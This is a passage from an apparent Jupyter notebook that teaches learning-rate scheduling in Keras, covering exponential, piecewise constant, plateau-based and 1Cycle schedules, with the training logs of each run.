0.4703 - val_accuracy: 0.8800\nEpoch 16/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.2196 - accuracy: 0.9231 - val_loss: 0.4657 - val_accuracy: 0.8870\nEpoch 17/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.2013 - accuracy: 0.9312 - val_loss: 0.5023 - val_accuracy: 0.8760\nEpoch 18/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.1938 - accuracy: 0.9331 - val_loss: 0.4782 - val_accuracy: 0.8856\nEpoch 19/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.1774 - accuracy: 0.9394 - val_loss: 0.4815 - val_accuracy: 0.8898\nEpoch 20/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.1703 - accuracy: 0.9418 - val_loss: 0.4674 - val_accuracy: 0.8902\nEpoch 21/25\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.1611 - accuracy: 0.9462 - val_loss: 0.5116 - val_accuracy: 0.8930\nEpoch 22/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.1530 - accuracy: 0.9481 - val_loss: 0.5326 - val_accuracy: 0.8934\nEpoch 23/25\n1719/1719 [==============================] - 3s 2ms/step - loss: 0.1436 - accuracy: 0.9519 - val_loss: 0.5297 - val_accuracy: 0.8902\nEpoch 24/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.1326 - accuracy: 0.9560 - val_loss: 0.5526 - val_accuracy: 0.8930\nEpoch 25/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.1308 - accuracy: 0.9560 - val_loss: 0.5699 - val_accuracy: 0.8928\n" ], [ "plt.plot(history.epoch, history.history[\"lr\"], \"o-\")\nplt.axis([0, n_epochs - 1, 0, 0.011])\nplt.xlabel(\"Epoch\")\nplt.ylabel(\"Learning Rate\")\nplt.title(\"Exponential Scheduling\", fontsize=14)\nplt.grid(True)\nplt.show()", "_____no_output_____" ] ], [ [ "The schedule function can take the current learning rate as a second argument:", "_____no_output_____" ] ], [ [ "def exponential_decay_fn(epoch, lr):\n return lr * 0.1**(1 / 20)", "_____no_output_____" ] ], [ [ "If you want to update the learning rate at each iteration rather than at each epoch, you must write your own callback class:", "_____no_output_____" ] ], [ [ "K = keras.backend\n\nclass ExponentialDecay(keras.callbacks.Callback):\n def __init__(self, s=40000):\n super().__init__()\n self.s = s\n\n def on_batch_begin(self, batch, logs=None):\n # Note: the `batch` argument is reset at each epoch\n lr = K.get_value(self.model.optimizer.learning_rate)\n K.set_value(self.model.optimizer.learning_rate, lr * 0.1**(1 / s))\n\n def on_epoch_end(self, epoch, logs=None):\n logs = logs or {}\n logs['lr'] = K.get_value(self.model.optimizer.learning_rate)\n\nmodel = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.Dense(300, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(100, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(10, activation=\"softmax\")\n])\nlr0 = 0.01\noptimizer = keras.optimizers.Nadam(learning_rate=lr0)\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=optimizer, metrics=[\"accuracy\"])\nn_epochs = 25\n\ns = 20 * len(X_train) // 32 # number of steps in 20 epochs (batch size = 32)\nexp_decay = ExponentialDecay(s)\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs,\n validation_data=(X_valid_scaled, y_valid),\n callbacks=[exp_decay])", "Epoch 1/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 1.1153 - accuracy: 0.7390 - val_loss: 0.9588 - val_accuracy: 0.7338\nEpoch 2/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.6929 - accuracy: 0.7934 - val_loss: 0.5328 - val_accuracy: 0.8318\nEpoch 3/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.6317 - accuracy: 0.8097 - val_loss: 0.7656 - val_accuracy: 0.8278\nEpoch 4/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.5827 - accuracy: 0.8258 - val_loss: 0.5585 - val_accuracy: 0.8382\nEpoch 5/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.5041 - accuracy: 0.8407 - val_loss: 0.5367 - val_accuracy: 0.8574\nEpoch 6/25\n1719/1719 [==============================] - 4s 3ms/step - loss: 0.4595 - accuracy: 0.8588 - val_loss: 0.6000 - val_accuracy: 0.8516\nEpoch 7/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.4490 - accuracy: 0.8644 - val_loss: 0.4605 - val_accuracy: 0.8648\nEpoch 8/25\n1719/1719 [==============================] - 4s 3ms/step - loss: 0.3925 - accuracy: 0.8783 - val_loss: 0.5076 - val_accuracy: 0.8616\nEpoch 9/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.4085 - accuracy: 0.8797 - val_loss: 0.4577 - val_accuracy: 0.8650\nEpoch 10/25\n1719/1719 [==============================] - 4s 3ms/step - loss: 0.3440 - accuracy: 0.8927 - val_loss: 0.5309 - val_accuracy: 0.8762\nEpoch 11/25\n1719/1719 [==============================] - 4s 3ms/step - loss: 0.3267 - accuracy: 0.8948 - val_loss: 0.4652 - val_accuracy: 0.8792\nEpoch 12/25\n1719/1719 [==============================] - 4s 3ms/step - loss: 0.3046 - accuracy: 0.9033 - val_loss: 0.4863 - val_accuracy: 0.8692\nEpoch 13/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.2811 - accuracy: 0.9087 - val_loss: 0.4726 - val_accuracy: 0.8770\nEpoch 14/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.2684 - accuracy: 0.9145 - val_loss: 0.4526 - val_accuracy: 0.8760\nEpoch 15/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.2478 - accuracy: 0.9209 - val_loss: 0.4926 - val_accuracy: 0.8838\nEpoch 16/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.2315 - accuracy: 0.9253 - val_loss: 0.4686 - val_accuracy: 0.8840\nEpoch 17/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.2164 - accuracy: 0.9318 - val_loss: 0.4845 - val_accuracy: 0.8858\nEpoch 18/25\n1719/1719 [==============================] - 4s 3ms/step - loss: 0.2093 - accuracy: 0.9346 - val_loss: 0.4923 - val_accuracy: 0.8834\nEpoch 19/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.1929 - accuracy: 0.9396 - val_loss: 0.4779 - val_accuracy: 0.8880\nEpoch 20/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.1852 - accuracy: 0.9439 - val_loss: 0.4886 - val_accuracy: 0.8868\nEpoch 21/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.1740 - accuracy: 0.9470 - val_loss: 0.5097 - val_accuracy: 0.8852\nEpoch 22/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.1668 - accuracy: 0.9474 - val_loss: 0.5161 - val_accuracy: 0.8898\nEpoch 23/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.1571 - accuracy: 0.9530 - val_loss: 0.5381 - val_accuracy: 0.8886\nEpoch 24/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.1444 - accuracy: 0.9575 - val_loss: 0.5415 - val_accuracy: 0.8910\nEpoch 25/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.1447 - accuracy: 0.9569 - val_loss: 0.5833 - val_accuracy: 0.8880\n" ], [ "n_steps = n_epochs * len(X_train) // 32\nsteps = np.arange(n_steps)\nlrs = lr0 * 0.1**(steps / s)", "_____no_output_____" ], [ "plt.plot(steps, lrs, \"-\", linewidth=2)\nplt.axis([0, n_steps - 1, 0, lr0 * 1.1])\nplt.xlabel(\"Batch\")\nplt.ylabel(\"Learning Rate\")\nplt.title(\"Exponential Scheduling (per batch)\", fontsize=14)\nplt.grid(True)\nplt.show()", "_____no_output_____" ] ], [ [ "### Piecewise Constant Scheduling", "_____no_output_____" ] ], [ [ "def piecewise_constant_fn(epoch):\n if epoch < 5:\n return 0.01\n elif epoch < 15:\n return 0.005\n else:\n return 0.001", "_____no_output_____" ], [ "def piecewise_constant(boundaries, values):\n boundaries = np.array([0] + boundaries)\n values = np.array(values)\n def piecewise_constant_fn(epoch):\n return values[np.argmax(boundaries > epoch) - 1]\n return piecewise_constant_fn\n\npiecewise_constant_fn = piecewise_constant([5, 15], [0.01, 0.005, 0.001])", "_____no_output_____" ], [ "lr_scheduler = keras.callbacks.LearningRateScheduler(piecewise_constant_fn)\n\nmodel = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.Dense(300, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(100, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(10, activation=\"softmax\")\n])\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=\"nadam\", metrics=[\"accuracy\"])\nn_epochs = 25\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs,\n validation_data=(X_valid_scaled, y_valid),\n callbacks=[lr_scheduler])", "Epoch 1/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 1.1511 - accuracy: 0.7326 - val_loss: 0.8456 - val_accuracy: 0.7410\nEpoch 2/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.7371 - accuracy: 0.7786 - val_loss: 0.6796 - val_accuracy: 0.8092\nEpoch 3/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.8055 - accuracy: 0.7700 - val_loss: 1.7429 - val_accuracy: 0.4514\nEpoch 4/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 1.0351 - accuracy: 0.6826 - val_loss: 0.9870 - val_accuracy: 0.6928\nEpoch 5/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.9185 - accuracy: 0.7098 - val_loss: 0.8727 - val_accuracy: 0.6932\nEpoch 6/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.6905 - accuracy: 0.7481 - val_loss: 0.6694 - val_accuracy: 0.7696\nEpoch 7/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.6115 - accuracy: 0.7713 - val_loss: 0.6956 - val_accuracy: 0.7306\nEpoch 8/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.5791 - accuracy: 0.7793 - val_loss: 0.6659 - val_accuracy: 0.7738\nEpoch 9/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.5622 - accuracy: 0.7881 - val_loss: 0.7363 - val_accuracy: 0.7850\nEpoch 10/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.5253 - accuracy: 0.8470 - val_loss: 0.5484 - val_accuracy: 0.8578\nEpoch 11/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.4401 - accuracy: 0.8694 - val_loss: 0.6724 - val_accuracy: 0.8602\nEpoch 12/25\n1719/1719 [==============================] - 4s 3ms/step - loss: 0.4334 - accuracy: 0.8732 - val_loss: 0.5551 - val_accuracy: 0.8504\nEpoch 13/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.4179 - accuracy: 0.8771 - val_loss: 0.6685 - val_accuracy: 0.8554\nEpoch 14/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.4300 - accuracy: 0.8775 - val_loss: 0.5340 - val_accuracy: 0.8584\nEpoch 15/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.4069 - accuracy: 0.8777 - val_loss: 0.6519 - val_accuracy: 0.8478\nEpoch 16/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.3349 - accuracy: 0.8953 - val_loss: 0.4801 - val_accuracy: 0.8778\nEpoch 17/25\n1719/1719 [==============================] - 4s 3ms/step - loss: 0.2695 - accuracy: 0.9109 - val_loss: 0.4880 - val_accuracy: 0.8786\nEpoch 18/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.2568 - accuracy: 0.9136 - val_loss: 0.4726 - val_accuracy: 0.8822\nEpoch 19/25\n1719/1719 [==============================] - 5s 3ms/step - loss: 0.2436 - accuracy: 0.9203 - val_loss: 0.4792 - val_accuracy: 0.8842\nEpoch 20/25\n1719/1719 [==============================] - 4s 3ms/step - loss: 0.2421 - accuracy: 0.9212 - val_loss: 0.5088 - val_accuracy: 0.8838\nEpoch 21/25\n1719/1719 [==============================] - 4s 3ms/step - loss: 0.2288 - accuracy: 0.9246 - val_loss: 0.5083 - val_accuracy: 0.8830\nEpoch 22/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.2215 - accuracy: 0.9270 - val_loss: 0.5217 - val_accuracy: 0.8846\nEpoch 23/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.2106 - accuracy: 0.9297 - val_loss: 0.5297 - val_accuracy: 0.8834\nEpoch 24/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.2002 - accuracy: 0.9334 - val_loss: 0.5597 - val_accuracy: 0.8864\nEpoch 25/25\n1719/1719 [==============================] - 4s 2ms/step - loss: 0.2005 - accuracy: 0.9350 - val_loss: 0.5533 - val_accuracy: 0.8868\n" ], [ "plt.plot(history.epoch, [piecewise_constant_fn(epoch) for epoch in history.epoch], \"o-\")\nplt.axis([0, n_epochs - 1, 0, 0.011])\nplt.xlabel(\"Epoch\")\nplt.ylabel(\"Learning Rate\")\nplt.title(\"Piecewise Constant Scheduling\", fontsize=14)\nplt.grid(True)\nplt.show()", "_____no_output_____" ] ], [ [ "### Performance Scheduling", "_____no_output_____" ] ], [ [ "tf.random.set_seed(42)\nnp.random.seed(42)", "_____no_output_____" ], [ "lr_scheduler = keras.callbacks.ReduceLROnPlateau(factor=0.5, patience=5)\n\nmodel = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.Dense(300, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(100, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(10, activation=\"softmax\")\n])\noptimizer = keras.optimizers.SGD(learning_rate=0.02, momentum=0.9)\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=optimizer, metrics=[\"accuracy\"])\nn_epochs = 25\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs,\n validation_data=(X_valid_scaled, y_valid),\n callbacks=[lr_scheduler])", "Epoch 1/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.7116 - accuracy: 0.7769 - val_loss: 0.4869 - val_accuracy: 0.8478\nEpoch 2/25\n1719/1719 [==============================] - 2s 947us/step - loss: 0.4912 - accuracy: 0.8390 - val_loss: 0.5958 - val_accuracy: 0.8270\nEpoch 3/25\n1719/1719 [==============================] - 2s 987us/step - loss: 0.5222 - accuracy: 0.8379 - val_loss: 0.4869 - val_accuracy: 0.8584\nEpoch 4/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.5061 - accuracy: 0.8467 - val_loss: 0.4588 - val_accuracy: 0.8548\nEpoch 5/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.5216 - accuracy: 0.8469 - val_loss: 0.6096 - val_accuracy: 0.8300\nEpoch 6/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.4984 - accuracy: 0.8546 - val_loss: 0.5359 - val_accuracy: 0.8498\nEpoch 7/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.5104 - accuracy: 0.8579 - val_loss: 0.5457 - val_accuracy: 0.8522\nEpoch 8/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.5375 - accuracy: 0.8538 - val_loss: 0.6445 - val_accuracy: 0.8218\nEpoch 9/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.5333 - accuracy: 0.8522 - val_loss: 0.5472 - val_accuracy: 0.8560\nEpoch 10/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.3280 - accuracy: 0.8902 - val_loss: 0.3826 - val_accuracy: 0.8876\nEpoch 11/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2410 - accuracy: 0.9135 - val_loss: 0.4025 - val_accuracy: 0.8876\nEpoch 12/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2266 - accuracy: 0.9180 - val_loss: 0.4540 - val_accuracy: 0.8694\nEpoch 13/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2129 - accuracy: 0.9221 - val_loss: 0.4310 - val_accuracy: 0.8866\nEpoch 14/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.1959 - accuracy: 0.9270 - val_loss: 0.4406 - val_accuracy: 0.8814\nEpoch 15/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.1975 - accuracy: 0.9277 - val_loss: 0.4341 - val_accuracy: 0.8840\nEpoch 16/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.1409 - accuracy: 0.9464 - val_loss: 0.4220 - val_accuracy: 0.8932\nEpoch 17/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.1181 - accuracy: 0.9542 - val_loss: 0.4409 - val_accuracy: 0.8948\nEpoch 18/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.1124 - accuracy: 0.9560 - val_loss: 0.4480 - val_accuracy: 0.8898\nEpoch 19/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.1070 - accuracy: 0.9579 - val_loss: 0.4610 - val_accuracy: 0.8932\nEpoch 20/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.1016 - accuracy: 0.9606 - val_loss: 0.4845 - val_accuracy: 0.8918\nEpoch 21/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.0848 - accuracy: 0.9686 - val_loss: 0.4829 - val_accuracy: 0.8934\nEpoch 22/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.0792 - accuracy: 0.9700 - val_loss: 0.4906 - val_accuracy: 0.8952\nEpoch 23/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.0751 - accuracy: 0.9720 - val_loss: 0.4951 - val_accuracy: 0.8950\nEpoch 24/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.0687 - accuracy: 0.9739 - val_loss: 0.5109 - val_accuracy: 0.8948\nEpoch 25/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.0683 - accuracy: 0.9752 - val_loss: 0.5241 - val_accuracy: 0.8936\n" ], [ "plt.plot(history.epoch, history.history[\"lr\"], \"bo-\")\nplt.xlabel(\"Epoch\")\nplt.ylabel(\"Learning Rate\", color='b')\nplt.tick_params('y', colors='b')\nplt.gca().set_xlim(0, n_epochs - 1)\nplt.grid(True)\n\nax2 = plt.gca().twinx()\nax2.plot(history.epoch, history.history[\"val_loss\"], \"r^-\")\nax2.set_ylabel('Validation Loss', color='r')\nax2.tick_params('y', colors='r')\n\nplt.title(\"Reduce LR on Plateau\", fontsize=14)\nplt.show()", "_____no_output_____" ] ], [ [ "### tf.keras schedulers", "_____no_output_____" ] ], [ [ "model = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.Dense(300, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(100, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(10, activation=\"softmax\")\n])\ns = 20 * len(X_train) // 32 # number of steps in 20 epochs (batch size = 32)\nlearning_rate = keras.optimizers.schedules.ExponentialDecay(0.01, s, 0.1)\noptimizer = keras.optimizers.SGD(learning_rate)\nmodel.compile(loss=\"sparse_categorical_crossentropy\", optimizer=optimizer, metrics=[\"accuracy\"])\nn_epochs = 25\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs,\n validation_data=(X_valid_scaled, y_valid))", "Epoch 1/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.5995 - accuracy: 0.7923 - val_loss: 0.4095 - val_accuracy: 0.8606\nEpoch 2/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.3890 - accuracy: 0.8613 - val_loss: 0.3738 - val_accuracy: 0.8692\nEpoch 3/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.3530 - accuracy: 0.8772 - val_loss: 0.3735 - val_accuracy: 0.8692\nEpoch 4/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.3296 - accuracy: 0.8813 - val_loss: 0.3494 - val_accuracy: 0.8798\nEpoch 5/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.3178 - accuracy: 0.8867 - val_loss: 0.3430 - val_accuracy: 0.8794\nEpoch 6/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2930 - accuracy: 0.8951 - val_loss: 0.3414 - val_accuracy: 0.8826\nEpoch 7/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2854 - accuracy: 0.8985 - val_loss: 0.3354 - val_accuracy: 0.8810\nEpoch 8/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2714 - accuracy: 0.9039 - val_loss: 0.3364 - val_accuracy: 0.8824\nEpoch 9/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2714 - accuracy: 0.9047 - val_loss: 0.3265 - val_accuracy: 0.8846\nEpoch 10/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2570 - accuracy: 0.9084 - val_loss: 0.3238 - val_accuracy: 0.8854\nEpoch 11/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2502 - accuracy: 0.9117 - val_loss: 0.3250 - val_accuracy: 0.8862\nEpoch 12/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2453 - accuracy: 0.9145 - val_loss: 0.3299 - val_accuracy: 0.8830\nEpoch 13/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2408 - accuracy: 0.9154 - val_loss: 0.3219 - val_accuracy: 0.8870\nEpoch 14/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2380 - accuracy: 0.9154 - val_loss: 0.3221 - val_accuracy: 0.8860\nEpoch 15/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2378 - accuracy: 0.9166 - val_loss: 0.3208 - val_accuracy: 0.8864\nEpoch 16/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2318 - accuracy: 0.9191 - val_loss: 0.3184 - val_accuracy: 0.8892\nEpoch 17/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2266 - accuracy: 0.9212 - val_loss: 0.3197 - val_accuracy: 0.8906\nEpoch 18/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2284 - accuracy: 0.9185 - val_loss: 0.3169 - val_accuracy: 0.8906\nEpoch 19/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2286 - accuracy: 0.9205 - val_loss: 0.3197 - val_accuracy: 0.8884\nEpoch 20/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2288 - accuracy: 0.9211 - val_loss: 0.3169 - val_accuracy: 0.8906\nEpoch 21/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2265 - accuracy: 0.9212 - val_loss: 0.3179 - val_accuracy: 0.8904\nEpoch 22/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2258 - accuracy: 0.9205 - val_loss: 0.3163 - val_accuracy: 0.8914\nEpoch 23/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2224 - accuracy: 0.9226 - val_loss: 0.3170 - val_accuracy: 0.8904\nEpoch 24/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2182 - accuracy: 0.9244 - val_loss: 0.3165 - val_accuracy: 0.8898\nEpoch 25/25\n1719/1719 [==============================] - 2s 1ms/step - loss: 0.2224 - accuracy: 0.9229 - val_loss: 0.3164 - val_accuracy: 0.8904\n" ] ], [ [ "For piecewise constant scheduling, try this:", "_____no_output_____" ] ], [ [ "learning_rate = keras.optimizers.schedules.PiecewiseConstantDecay(\n boundaries=[5. * n_steps_per_epoch, 15. * n_steps_per_epoch],\n values=[0.01, 0.005, 0.001])", "_____no_output_____" ] ], [ [ "### 1Cycle scheduling", "_____no_output_____" ] ], [ [ "K = keras.backend\n\nclass ExponentialLearningRate(keras.callbacks.Callback):\n def __init__(self, factor):\n self.factor = factor\n self.rates = []\n self.losses = []\n def on_batch_end(self, batch, logs):\n self.rates.append(K.get_value(self.model.optimizer.learning_rate))\n self.losses.append(logs[\"loss\"])\n K.set_value(self.model.optimizer.learning_rate, self.model.optimizer.learning_rate * self.factor)\n\ndef find_learning_rate(model, X, y, epochs=1, batch_size=32, min_rate=10**-5, max_rate=10):\n init_weights = model.get_weights()\n iterations = math.ceil(len(X) / batch_size) * epochs\n factor = np.exp(np.log(max_rate / min_rate) / iterations)\n init_lr = K.get_value(model.optimizer.learning_rate)\n K.set_value(model.optimizer.learning_rate, min_rate)\n exp_lr = ExponentialLearningRate(factor)\n history = model.fit(X, y, epochs=epochs, batch_size=batch_size,\n callbacks=[exp_lr])\n K.set_value(model.optimizer.learning_rate, init_lr)\n model.set_weights(init_weights)\n return exp_lr.rates, exp_lr.losses\n\ndef plot_lr_vs_loss(rates, losses):\n plt.plot(rates, losses)\n plt.gca().set_xscale('log')\n plt.hlines(min(losses), min(rates), max(rates))\n plt.axis([min(rates), max(rates), min(losses), (losses[0] + min(losses)) / 2])\n plt.xlabel(\"Learning rate\")\n plt.ylabel(\"Loss\")", "_____no_output_____" ] ], [ [ "**Warning**: In the `on_batch_end()` method, `logs[\"loss\"]` used to contain the batch loss, but in TensorFlow 2.2.0 it was replaced with the mean loss (since the start of the epoch). This explains why the graph below is much smoother than in the book (if you are using TF 2.2 or above). It also means that there is a lag between the moment the batch loss starts exploding and the moment the explosion becomes clear in the graph. So you should choose a slightly smaller learning rate than you would have chosen with the \"noisy\" graph. Alternatively, you can tweak the `ExponentialLearningRate` callback above so it computes the batch loss (based on the current mean loss and the previous mean loss):\n\n```python\nclass ExponentialLearningRate(keras.callbacks.Callback):\n def __init__(self, factor):\n self.factor = factor\n self.rates = []\n self.losses = []\n def on_epoch_begin(self, epoch, logs=None):\n self.prev_loss = 0\n def on_batch_end(self, batch, logs=None):\n batch_loss = logs[\"loss\"] * (batch + 1) - self.prev_loss * batch\n self.prev_loss = logs[\"loss\"]\n self.rates.append(K.get_value(self.model.optimizer.learning_rate))\n self.losses.append(batch_loss)\n K.set_value(self.model.optimizer.learning_rate, self.model.optimizer.learning_rate * self.factor)\n```", "_____no_output_____" ] ], [ [ "tf.random.set_seed(42)\nnp.random.seed(42)\n\nmodel = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[28, 28]),\n keras.layers.Dense(300, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(100, activation=\"selu\", kernel_initializer=\"lecun_normal\"),\n keras.layers.Dense(10, activation=\"softmax\")\n])\nmodel.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=keras.optimizers.SGD(learning_rate=1e-3),\n metrics=[\"accuracy\"])", "_____no_output_____" ], [ "batch_size = 128\nrates, losses = find_learning_rate(model, X_train_scaled, y_train, epochs=1, batch_size=batch_size)\nplot_lr_vs_loss(rates, losses)", "430/430 [==============================] - 1s 2ms/step - loss: nan - accuracy: 0.3120\n" ], [ "class OneCycleScheduler(keras.callbacks.Callback):\n def __init__(self, iterations, max_rate, start_rate=None,\n last_iterations=None, last_rate=None):\n self.iterations = iterations\n self.max_rate = max_rate\n self.start_rate = start_rate or max_rate / 10\n self.last_iterations = last_iterations or iterations // 10 + 1\n self.half_iteration = (iterations - self.last_iterations) // 2\n self.last_rate = last_rate or self.start_rate / 1000\n self.iteration = 0\n def _interpolate(self, iter1, iter2, rate1, rate2):\n return ((rate2 - rate1) * (self.iteration - iter1)\n / (iter2 - iter1) + rate1)\n def on_batch_begin(self, batch, logs):\n if self.iteration < self.half_iteration:\n rate = self._interpolate(0, self.half_iteration, self.start_rate, self.max_rate)\n elif self.iteration < 2 * self.half_iteration:\n rate = self._interpolate(self.half_iteration, 2 * self.half_iteration,\n self.max_rate, self.start_rate)\n else:\n rate = self._interpolate(2 * self.half_iteration, self.iterations,\n self.start_rate, self.last_rate)\n self.iteration += 1\n K.set_value(self.model.optimizer.learning_rate, rate)", "_____no_output_____" ], [ "n_epochs = 25\nonecycle = OneCycleScheduler(math.ceil(len(X_train) / batch_size) * n_epochs, max_rate=0.05)\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs, batch_size=batch_size,\n validation_data=(X_valid_scaled, y_valid),\n callbacks=[onecycle])", "Epoch 1/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.6572 - accuracy: 0.7740 - val_loss: 0.4872 - val_accuracy: 0.8338\nEpoch 2/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.4580 - accuracy: 0.8397 - val_loss: 0.4274 - val_accuracy: 0.8520\nEpoch 3/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.4121 - accuracy: 0.8545 - val_loss: 0.4116 - val_accuracy: 0.8588\nEpoch 4/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.3837 - accuracy: 0.8642 - val_loss: 0.3868 - val_accuracy: 0.8688\nEpoch 5/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.3639 - accuracy: 0.8719 - val_loss: 0.3766 - val_accuracy: 0.8688\nEpoch 6/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.3456 - accuracy: 0.8775 - val_loss: 0.3739 - val_accuracy: 0.8706\nEpoch 7/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.3330 - accuracy: 0.8811 - val_loss: 0.3635 - val_accuracy: 0.8708\nEpoch 8/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.3184 - accuracy: 0.8861 - val_loss: 0.3959 - val_accuracy: 0.8610\nEpoch 9/25\n430/430 [==============================] - 1s 2ms/step - loss: 0.3065 - accuracy: 0.8890 - val_loss: 0.3475 - val_accuracy: 0.8770\nEpoch 10/25\n430/430 